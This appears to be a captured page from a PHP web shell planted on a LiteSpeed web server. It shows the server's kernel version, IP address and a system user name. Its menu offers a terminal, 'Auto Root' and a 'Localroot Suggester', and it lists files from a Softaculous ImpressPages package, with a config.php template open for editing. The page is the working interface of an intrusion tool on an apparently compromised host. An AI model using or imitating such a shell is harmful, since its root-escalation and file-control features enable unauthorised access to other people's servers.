Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
impresspage /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-02-27 06:46
php53
[ DIR ]
drwxr-xr-x
2026-02-27 06:46
php56
[ DIR ]
drwxr-xr-x
2026-02-27 06:46
php71
[ DIR ]
drwxr-xr-x
2026-02-27 06:46
php81
[ DIR ]
drwxr-xr-x
2026-02-27 06:46
php82
[ DIR ]
drwxr-xr-x
2026-02-27 06:46
PasswordHash.php
6.74
KB
-rwxr-xr-x
2021-12-23 05:54
clone.php
5.88
KB
-rwxr-xr-x
2024-05-02 05:19
config.php
820
B
-rwxr-xr-x
2021-12-23 05:54
edit.php
4.37
KB
-rwxr-xr-x
2024-05-02 05:19
edit.xml
433
B
-rwxr-xr-x
2021-12-23 05:54
fileindex.php
107
B
-rwxr-xr-x
2021-12-23 05:54
import.php
4.5
KB
-rwxr-xr-x
2024-05-02 05:19
info.xml
4.18
KB
-rwxr-xr-x
2024-05-02 04:25
install.js
921
B
-rwxr-xr-x
2021-12-23 05:54
install.php
4.89
KB
-rwxr-xr-x
2024-05-02 05:19
install.xml
1.25
KB
-rwxr-xr-x
2021-12-23 05:54
md5
6.56
KB
-rwxr-xr-x
2024-05-02 05:19
notes.txt
455
B
-rwxr-xr-x
2021-12-23 05:54
upgrade.php
3.52
KB
-rwxr-xr-x
2024-05-02 05:19
upgrade.xml
1.17
KB
-rwxr-xr-x
2021-12-23 05:54
Save
Rename
<?php /** * @package ImpressPages */ return [ 'sessionName' => 'ses[[SESSION_NAME]]', // prevents session conflict when two sites runs on the same server 'developmentEnvironment' => 1, // displays error and debug information. Change to 0 before deployment to production server 'showErrors' => 1, // 0 if you don't wish to display errors on the page 'debugMode' => 0, // Debug mode loads raw unminified JavaScript files, alerts AJAX errors. 'timezone' => 'America/New_York', // PHP 5 requires timezone to be set. 'db' => array ( 'hostname' => '[[softdbhost]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'tablePrefix' => '[[dbprefix]]', 'database' => '[[softdb]]', 'charset' => 'utf8', ), // Database configuration ];